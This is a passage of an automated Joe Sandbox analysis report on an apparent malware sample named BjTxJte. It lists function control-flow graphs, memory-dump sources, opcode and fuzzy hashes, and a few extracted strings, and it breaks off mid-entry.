294->309 313 6f4b861-6f4b865 295->313 314 6f4b882-6f4b885 295->314 296->295 311 6f4b790-6f4b793 297->311 312 6f4b788-6f4b78b 297->312 322 6f4b77b-6f4b77e 298->322 300->301 306 6f4bc75-6f4bc77 301->306 307 6f4ba0f-6f4ba37 301->307 303->260 316 6f4b8ce-6f4b8d1 303->316 304->270 315 6f4b8aa-6f4b8ba 304->315 305->279 326 6f4bc7e-6f4bc81 306->326 327 6f4bc79 306->327 373 6f4ba41-6f4ba85 307->373 374 6f4ba39-6f4ba3c 307->374 319 6f4b941-6f4b944 309->319 320 6f4b933-6f4b93c 309->320 323 6f4b795-6f4b79e 311->323 324 6f4b7a3-6f4b7a6 311->324 312->311 313->270 325 6f4b86b-6f4b87b 313->325 314->282 314->292 315->260 349 6f4b8c0 315->349 329 6f4b8f4-6f4b8f7 316->329 330 6f4b8d3-6f4b8d7 316->330 318->291 333 6f4b946-6f4b94c 319->333 334 6f4b951-6f4b954 319->334 320->319 322->297 323->324 324->260 336 6f4b7a8-6f4b7ab 324->336 325->330 355 6f4b87d 325->355 326->289 328 6f4bc87-6f4bc90 326->328 327->326 340 6f4b90e-6f4b911 329->340 341 6f4b8f9-6f4b8fd 329->341 330->270 338 6f4b8dd-6f4b8ed 330->338 333->334 344 6f4b956-6f4b95b 334->344 345 6f4b95e-6f4b961 334->345 347 6f4b7b2-6f4b7b5 336->347 348 6f4b7ad-6f4b7af 336->348 338->304 368 6f4b8ef 338->368 340->285 340->309 341->270 350 6f4b903-6f4b909 341->350 344->345 353 6f4b974-6f4b977 345->353 354 6f4b963-6f4b967 345->354 356 6f4b7b7-6f4b7ba 347->356 357 6f4b7bc-6f4b7bf 347->357 348->347 349->303 350->340 362 6f4b979-6f4b985 353->362 363 6f4b98a-6f4b98c 353->363 354->270 361 6f4b969-6f4b96f 354->361 355->314 356->357 358 6f4b7ca-6f4b7cd 356->358 357->266 359 6f4b7c5 357->359 366 6f4b7dd-6f4b7e0 358->366 367 6f4b7cf-6f4b7d8 358->367 359->358 361->353 362->363 364 6f4b993-6f4b996 363->364 365 6f4b98e 363->365 364->256 372 6f4b99c-6f4b9a6 364->372 365->364 366->260 366->261 367->366 368->329 378 6f4bc6a-6f4bc74 373->378 379 6f4ba8b-6f4ba94 373->379 374->328 380 6f4bc60-6f4bc65 379->380 381 6f4ba9a-6f4bb06 call 6f46580 379->381 380->378 389 6f4bc00-6f4bc15 381->389 390 6f4bb0c-6f4bb11 381->390 389->380 391 6f4bb13-6f4bb19 390->391 392 6f4bb2d 390->392 394 6f4bb1f-6f4bb21 391->394 395 6f4bb1b-6f4bb1d 391->395 396 6f4bb2f-6f4bb35 392->396 397 6f4bb2b 394->397 395->397 398 6f4bb37-6f4bb3d 396->398 399 6f4bb4a-6f4bb57 396->399 397->396 400 6f4bb43 398->400 401 6f4bbeb-6f4bbfa 398->401 406 6f4bb6f-6f4bb7c 399->406 407 6f4bb59-6f4bb5f 399->407 400->399 402 6f4bbb2-6f4bbbf 400->402 403 6f4bb7e-6f4bb8b 400->403 401->389 401->390 414 6f4bbd7-6f4bbe4 402->414 415 6f4bbc1-6f4bbc7 402->415 412 6f4bba3-6f4bbb0 403->412 413 6f4bb8d-6f4bb93 403->413 406->401 410 6f4bb61 407->410 411 6f4bb63-6f4bb65 407->411 410->406 411->406 412->401 417 6f4bb95 413->417 418 6f4bb97-6f4bb99 413->418 414->401 419 6f4bbc9 415->419 420 6f4bbcb-6f4bbcd 415->420 417->412 418->412 419->414 420->414
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: d2f7b8fbffe2df637fac668d10d57d91d14d40cadf5696b6f6cbaff0f6693a4a
                                  • Instruction ID: 8a400dba022f639d1d7186d83a49be65bae9842978e5ba4998ba3529be74771c
                                  • Opcode Fuzzy Hash: d2f7b8fbffe2df637fac668d10d57d91d14d40cadf5696b6f6cbaff0f6693a4a
                                  • Instruction Fuzzy Hash: 98024C30E1020A8FDBA4EF68D580AADBBB6FF85310F10856AD415DBB56DB35EC41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F49120 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 423 6f49120-6f49145 424 6f49147-6f4914a 423->424 425 6f49170-6f49173 424->425 426 6f4914c-6f4916b 424->426 427 6f49a33-6f49a35 425->427 428 6f49179-6f4918e 425->428 426->425 430 6f49a37 427->430 431 6f49a3c-6f49a3f 427->431 434 6f491a6-6f491bc 428->434 435 6f49190-6f49196 428->435 430->431 431->424 432 6f49a45-6f49a4f 431->432 440 6f491c7-6f491c9 434->440 437 6f49198 435->437 438 6f4919a-6f4919c 435->438 437->434 438->434 441 6f491e1-6f49252 440->441 442 6f491cb-6f491d1 440->442 453 6f49254-6f49277 441->453 454 6f4927e-6f4929a 441->454 443 6f491d5-6f491d7 442->443 444 6f491d3 442->444 443->441 444->441 453->454 459 6f492c6-6f492e1 454->459 460 6f4929c-6f492bf 454->460 465 6f492e3-6f49305 459->465 466 6f4930c-6f49327 459->466 460->459 465->466 471 6f49352-6f4935c 466->471 472 6f49329-6f4934b 466->472 473 6f4936c-6f493e6 471->473 474 6f4935e-6f49367 471->474 472->471 480 6f49433-6f49448 473->480 481 6f493e8-6f49406 473->481 474->432 480->427 485 6f49422-6f49431 481->485 486 6f49408-6f49417 481->486 485->480 485->481 486->485
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: dc0f4742fa95b4e1efb696d3389aa74e837ed1e17076b3157293bb883742db0d
                                  • Instruction ID: 8b5662637d6460711e8a416551954a91c20eafef8eda06626564f61968f20f71
                                  • Opcode Fuzzy Hash: dc0f4742fa95b4e1efb696d3389aa74e837ed1e17076b3157293bb883742db0d
                                  • Instruction Fuzzy Hash: 0A914F30F0020A8FDF94DB65D990BAFB7B6FFC4200F108569D809EB799EA749D458B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4CF08 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 489 6f4cf08-6f4cf23 490 6f4cf25-6f4cf28 489->490 491 6f4cf71-6f4cf74 490->491 492 6f4cf2a-6f4cf6c 490->492 493 6f4cf76-6f4cf7b 491->493 494 6f4cf7e-6f4cf81 491->494 492->491 493->494 496 6f4cfa4-6f4cfa7 494->496 497 6f4cf83-6f4cf9f 494->497 498 6f4cfb6-6f4cfb9 496->498 499 6f4cfa9-6f4cfab 496->499 497->496 503 6f4d002-6f4d005 498->503 504 6f4cfbb-6f4cffd 498->504 501 6f4cfb1 499->501 502 6f4d2af-6f4d2b8 499->502 501->498 508 6f4d2c7-6f4d2d3 502->508 509 6f4d2ba-6f4d2bf 502->509 506 6f4d014-6f4d017 503->506 507 6f4d007-6f4d009 503->507 504->503 513 6f4d060-6f4d063 506->513 514 6f4d019-6f4d05b 506->514 511 6f4d3f1 507->511 512 6f4d00f 507->512 517 6f4d3e4-6f4d3e9 508->517 518 6f4d2d9-6f4d2ed 508->518 509->508 521 6f4d3f4-6f4d400 511->521 512->506 519 6f4d065-6f4d0a7 513->519 520 6f4d0ac-6f4d0af 513->520 514->513 517->511 518->511 535 6f4d2f3-6f4d305 518->535 519->520 529 6f4d0b1-6f4d0c0 520->529 530 6f4d0f8-6f4d0fb 520->530 522 6f4d406-6f4d6f3 521->522 523 6f4d1ea-6f4d1f9 521->523 702 6f4d6f9-6f4d6ff 522->702 703 6f4d91a-6f4d924 522->703 533 6f4d208-6f4d214 523->533 534 6f4d1fb-6f4d200 523->534 536 6f4d0c2-6f4d0c7 529->536 537 6f4d0cf-6f4d0db 529->537 530->521 532 6f4d101-6f4d104 530->532 541 6f4d106-6f4d148 532->541 542 6f4d14d-6f4d150 532->542 538 6f4d925-6f4d95e 533->538 546 6f4d21a-6f4d22c 533->546 534->533 560 6f4d307-6f4d30d 535->560 561 6f4d329-6f4d32b 535->561 536->537 537->538 539 6f4d0e1-6f4d0f3 537->539 565 6f4d960-6f4d963 538->565 539->530 541->542 548 6f4d152-6f4d194 542->548 549 6f4d199-6f4d19c 542->549 562 6f4d231-6f4d234 546->562 548->549 556 6f4d1e5-6f4d1e8 549->556 557 6f4d19e-6f4d1e0 549->557 556->523 556->562 557->556 563 6f4d311-6f4d31d 560->563 564 6f4d30f 560->564 568 6f4d335-6f4d341 561->568 571 6f4d236-6f4d278 562->571 572 6f4d27d-6f4d280 562->572 573 6f4d31f-6f4d327 563->573 564->573 574 6f4d965-6f4d981 565->574 575 6f4d986-6f4d989 565->575 595 6f4d343-6f4d34d 568->595 596 6f4d34f 568->596 571->572 585 6f4d282-6f4d298 572->585 586 6f4d29d-6f4d29f 572->586 573->568 574->575 583 6f4d9bc-6f4d9bf 575->583 584 6f4d98b-6f4d9b7 575->584 598 6f4d9c1 call 6f4da7d 583->598 599 6f4d9ce-6f4d9d0 583->599 584->583 585->586 588 6f4d2a6-6f4d2a9 586->588 589 6f4d2a1 586->589 588->490 588->502 589->588 603 6f4d354-6f4d356 595->603 596->603 613 6f4d9c7-6f4d9c9 598->613 600 6f4d9d7-6f4d9da 599->600 601 6f4d9d2 599->601 600->565 606 6f4d9dc-6f4d9eb 600->606 601->600 603->511 611 6f4d35c-6f4d378 call 6f46580 603->611 622 6f4da52-6f4da67 606->622 623 6f4d9ed-6f4da50 call 6f46580 606->623 632 6f4d387-6f4d393 611->632 633 6f4d37a-6f4d37f 611->633 613->599 637 6f4da68 622->637 623->622 632->517 635 6f4d395-6f4d3e2 632->635 633->632 635->511 637->637 704 6f4d701-6f4d706 702->704 705 6f4d70e-6f4d717 702->705 704->705 705->538 706 6f4d71d-6f4d730 705->706 708 6f4d736-6f4d73c 706->708 709 6f4d90a-6f4d914 706->709 710 6f4d73e-6f4d743 708->710 711 6f4d74b-6f4d754 708->711 709->702 709->703 710->711 711->538 712 6f4d75a-6f4d77b 711->712 715 6f4d77d-6f4d782 712->715 716 6f4d78a-6f4d793 712->716 715->716 716->538 717 6f4d799-6f4d7b6 716->717 717->709 720 6f4d7bc-6f4d7c2 717->720 720->538 721 6f4d7c8-6f4d7e1 720->721 723 6f4d7e7-6f4d80e 721->723 724 6f4d8fd-6f4d904 721->724 723->538 727 6f4d814-6f4d81e 723->727 724->709 724->720 727->538 728 6f4d824-6f4d83b 727->728 730 6f4d83d-6f4d848 728->730 731 6f4d84a-6f4d865 728->731 730->731 731->724 736 6f4d86b-6f4d884 call 6f46580 731->736 740 6f4d886-6f4d88b 736->740 741 6f4d893-6f4d89c 736->741 740->741 741->538 742 6f4d8a2-6f4d8f6 741->742 742->724
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 547ac2b7c9ea2b780b6bcb4b0047df9a6a6755724f6a324787b7242d1bf60800
                                  • Instruction ID: cbef9a3f316ec314f7b53301a41fff3aa69c7b3ee447680f7da5e65a3680519b
                                  • Opcode Fuzzy Hash: 547ac2b7c9ea2b780b6bcb4b0047df9a6a6755724f6a324787b7242d1bf60800
                                  • Instruction Fuzzy Hash: 7D626230A006068FDB55EF68E690A6EBBB6FF84310F24856DD0059F769DB75EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F44B40 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 750 6f44b40-6f44b64 751 6f44b66-6f44b69 750->751 752 6f44b6f-6f44c67 751->752 753 6f45248-6f4524b 751->753 773 6f44c6d-6f44cba call 6f453e8 752->773 774 6f44cea-6f44cf1 752->774 754 6f4526c-6f4526e 753->754 755 6f4524d-6f45267 753->755 756 6f45275-6f45278 754->756 757 6f45270 754->757 755->754 756->751 759 6f4527e-6f4528b 756->759 757->756 787 6f44cc0-6f44cdc 773->787 775 6f44d75-6f44d7e 774->775 776 6f44cf7-6f44d67 774->776 775->759 793 6f44d72 776->793 794 6f44d69 776->794 790 6f44ce7 787->790 791 6f44cde 787->791 790->774 791->790 793->775 794->793
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: 6f625e8d220f48d695c18bf5871d61ae452c9c7e633c89d9ae85c3c2e88eaa40
                                  • Instruction ID: 5ab16f70b901fb4c2b3e78d785d69f6f04383db227e886d4e472e1b8ee4bae84
                                  • Opcode Fuzzy Hash: 6f625e8d220f48d695c18bf5871d61ae452c9c7e633c89d9ae85c3c2e88eaa40
                                  • Instruction Fuzzy Hash: F1617E71F002099FEF54AFA5C9547AEBAF6FF88710F208429E106AB394DB758C45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F49110 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1173 6f49110-6f49145 1175 6f49147-6f4914a 1173->1175 1176 6f49170-6f49173 1175->1176 1177 6f4914c-6f4916b 1175->1177 1178 6f49a33-6f49a35 1176->1178 1179 6f49179-6f4918e 1176->1179 1177->1176 1181 6f49a37 1178->1181 1182 6f49a3c-6f49a3f 1178->1182 1185 6f491a6-6f491bc 1179->1185 1186 6f49190-6f49196 1179->1186 1181->1182 1182->1175 1183 6f49a45-6f49a4f 1182->1183 1191 6f491c7-6f491c9 1185->1191 1188 6f49198 1186->1188 1189 6f4919a-6f4919c 1186->1189 1188->1185 1189->1185 1192 6f491e1-6f49252 1191->1192 1193 6f491cb-6f491d1 1191->1193 1204 6f49254-6f49277 1192->1204 1205 6f4927e-6f4929a 1192->1205 1194 6f491d5-6f491d7 1193->1194 1195 6f491d3 1193->1195 1194->1192 1195->1192 1204->1205 1210 6f492c6-6f492e1 1205->1210 1211 6f4929c-6f492bf 1205->1211 1216 6f492e3-6f49305 1210->1216 1217 6f4930c-6f49327 1210->1217 1211->1210 1216->1217 1222 6f49352-6f4935c 1217->1222 1223 6f49329-6f4934b 1217->1223 1224 6f4936c-6f493e6 1222->1224 1225 6f4935e-6f49367 1222->1225 1223->1222 1231 6f49433-6f49448 1224->1231 1232 6f493e8-6f49406 1224->1232 1225->1183 1231->1178 1236 6f49422-6f49431 1232->1236 1237 6f49408-6f49417 1232->1237 1236->1231 1236->1232 1237->1236
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: dc1963bca5a9fc3000f33acf2bbbd92dfbcab8cb94648eac33458779c83059bd
                                  • Instruction ID: 47b7ad18020eca4c626a21384c66dcb33d3102a37ea0dd0a66d0550bde9f2bf8
                                  • Opcode Fuzzy Hash: dc1963bca5a9fc3000f33acf2bbbd92dfbcab8cb94648eac33458779c83059bd
                                  • Instruction Fuzzy Hash: 04515030F001059FDF94DB69E990B6F7BFAEFC8250F108469D80ADB399EA759C418B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01E7EF2C Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1454 1e7ef2c-1e7ef49 1457 1e7ef4f-1e7efdc GlobalMemoryStatusEx 1454->1457 1458 1e7ef4b-1e7ef4e 1454->1458 1462 1e7efe5-1e7f00d 1457->1462 1463 1e7efde-1e7efe4 1457->1463 1463->1462
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 01E7EFCF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3282236828.0000000001E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1e70000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 5ebd57e95841b8fa04d687a5322af3215920baf5745794ae62d0d1e215561b8e
                                  • Instruction ID: 879a1e926db2e953f6d6d99cb085d19e4feec716a5a307fa962598ae697b3926
                                  • Opcode Fuzzy Hash: 5ebd57e95841b8fa04d687a5322af3215920baf5745794ae62d0d1e215561b8e
                                  • Instruction Fuzzy Hash: 44218971C042599FDB24DFAAD8046EEBFF4AF48310F1085AAE808A7250D7789980CFE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01E7EF68 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1466 1e7ef68-1e7efdc GlobalMemoryStatusEx 1468 1e7efe5-1e7f00d 1466->1468 1469 1e7efde-1e7efe4 1466->1469 1469->1468
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 01E7EFCF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3282236828.0000000001E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1e70000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 031968acf150704e84bb381e27ed0f3b052a6b0032be9c3d0c45175ffc334c00
                                  • Instruction ID: aa06bce388f55b66d0de874792f5669cd3bd82f8590e23528f3442a36778f7a1
                                  • Opcode Fuzzy Hash: 031968acf150704e84bb381e27ed0f3b052a6b0032be9c3d0c45175ffc334c00
                                  • Instruction Fuzzy Hash: C3111FB1C0065A9BDB10DFAAC444A9EFBF4AF48320F10816AE818A7240D778A940CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F44B31 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XPoq
                                  • API String ID: 0-2250694691
                                  • Opcode ID: 46d2473dfe0e2b297e121f7e9952fe49c6bf345c577533fbab84d666132e9335
                                  • Instruction ID: 5d9cfcdb3466cb2d8978019e811ebf995530d1da9d80722307ce715798784aa9
                                  • Opcode Fuzzy Hash: 46d2473dfe0e2b297e121f7e9952fe49c6bf345c577533fbab84d666132e9335
                                  • Instruction Fuzzy Hash: F9418E70F002089FDB44AFA5C914BAEBBF7FF88700F208129E105AB394DA758C05CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4DA7D Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: e0d56e9338ab6c08abb63383d4d781dd9d61403d5dc21aa244a348a00cee846d
                                  • Instruction ID: 5e66f7089e33d742fb0dccf7512d89fbf0d57be9c598cc8832622ac4b4067ab8
                                  • Opcode Fuzzy Hash: e0d56e9338ab6c08abb63383d4d781dd9d61403d5dc21aa244a348a00cee846d
                                  • Instruction Fuzzy Hash: 01419030E002099FDF65EF64D98469EBFB6FF85300F208529E401EB640EB74D846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F421C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: 631dd87bffa8dfddc609ca7624d2027003cddcbd86bc73d4d94e5a24e3562798
                                  • Instruction ID: 043863592b6217b13a2878fef6ad247132c7da33d69966ab735a7637982a6d76
                                  • Opcode Fuzzy Hash: 631dd87bffa8dfddc609ca7624d2027003cddcbd86bc73d4d94e5a24e3562798
                                  • Instruction Fuzzy Hash: C131BE31B002058FEB58AB74D65466E7EA6AF89210F248538E406DB395DE35DE06CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F482A0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq
                                  • API String ID: 0-2886413773
                                  • Opcode ID: af8776f40baf0f2321f5714c01b70d0e4f0b7b71fbfe6124a548816590d39f09
                                  • Instruction ID: e86d676c5844ff67dbc06b381be8192ec61beece9b6ff331e2c28d9d206bcbca
                                  • Opcode Fuzzy Hash: af8776f40baf0f2321f5714c01b70d0e4f0b7b71fbfe6124a548816590d39f09
                                  • Instruction Fuzzy Hash: 63F0AF32E00201CFEF68AE55FA827BC7FA6EB41394F144069D915CB641DB3ADE05C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F44270 Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11949f31b5d35d025da6241e02bf8a53bc8002229f8f461efd12841773fa61cc
                                  • Instruction ID: a6b148ae77a6dc86c62cc8ea28c19a84e4b5de5f0d879484706d222eeba3e4dc
                                  • Opcode Fuzzy Hash: 11949f31b5d35d025da6241e02bf8a53bc8002229f8f461efd12841773fa61cc
                                  • Instruction Fuzzy Hash: CC813C31B002099BDF54DBB9D5947AEBBF6EF89300F108529E40AEB755EA34DC428B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F461C8 Relevance: .2, Instructions: 229COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01d978a3c12d4d70dd6b95f2e61de64b2a9fb923bf6183f1108e03ecebe6f37e
                                  • Instruction ID: 26a7232169bfb4ce8c42d0b2628ea475cfe0a683bf655eb12edac73d8ba0b4a5
                                  • Opcode Fuzzy Hash: 01d978a3c12d4d70dd6b95f2e61de64b2a9fb923bf6183f1108e03ecebe6f37e
                                  • Instruction Fuzzy Hash: 5261B171F001214BDF54AA7ED88066EBADBEFD5620B154039E80ADB378DEB5DD0287D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F44594 Relevance: .2, Instructions: 223COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1e3564c38410a960cdcd73f3b1494fff9c27dbbfba8070459f8ff4df3bac92c
                                  • Instruction ID: 8bfce4d2a18215efc9544533ce11d6574dc4d51298613156585adfb292d685c0
                                  • Opcode Fuzzy Hash: d1e3564c38410a960cdcd73f3b1494fff9c27dbbfba8070459f8ff4df3bac92c
                                  • Instruction Fuzzy Hash: 1B914D30E002198FDF60DF68C850B9DBBB1FF99300F208699D449BB295DB70AA85CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F445A8 Relevance: .2, Instructions: 210COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17aef25b75ac207f0d52e00ded5446f2086a94092214d1f3386cd1ae6b584943
                                  • Instruction ID: 3cc4bc0c70f9e949ae55717dc89da64b91fe9fdf0761924af1bef80ff10ce385
                                  • Opcode Fuzzy Hash: 17aef25b75ac207f0d52e00ded5446f2086a94092214d1f3386cd1ae6b584943
                                  • Instruction Fuzzy Hash: 9E913D70E1061A8BDF60DF68C850B9DB7B1FF89310F208699D549BB395EB70A985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4EEE0 Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ba1a27e1bd1994c5de167cce4d334f8db07a1b586c2d27e5a682ff6b38f401a
                                  • Instruction ID: 8e50b7c2ef63989402accb99fe5578978414d1b1a67f38dd16508960ce5b41ee
                                  • Opcode Fuzzy Hash: 8ba1a27e1bd1994c5de167cce4d334f8db07a1b586c2d27e5a682ff6b38f401a
                                  • Instruction Fuzzy Hash: 9A710A71E012099FDB54EFA9D9809ADBBF6FF84310F248529E019AB755DB30EC46CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4EEF0 Relevance: .2, Instructions: 201COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8fafb233ca18df6b5491c4515834c257a8cd9ddc84512dd7463bbda3868fb667
                                  • Instruction ID: 861dca9823e84270289df90101c91927cf94e2c192512214c32342cd43cdacf4
                                  • Opcode Fuzzy Hash: 8fafb233ca18df6b5491c4515834c257a8cd9ddc84512dd7463bbda3868fb667
                                  • Instruction Fuzzy Hash: A9710A71E012099FDB54EFA9D98099DBBF6FF84310F248429D419AB765DB30EC46CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4FC49 Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
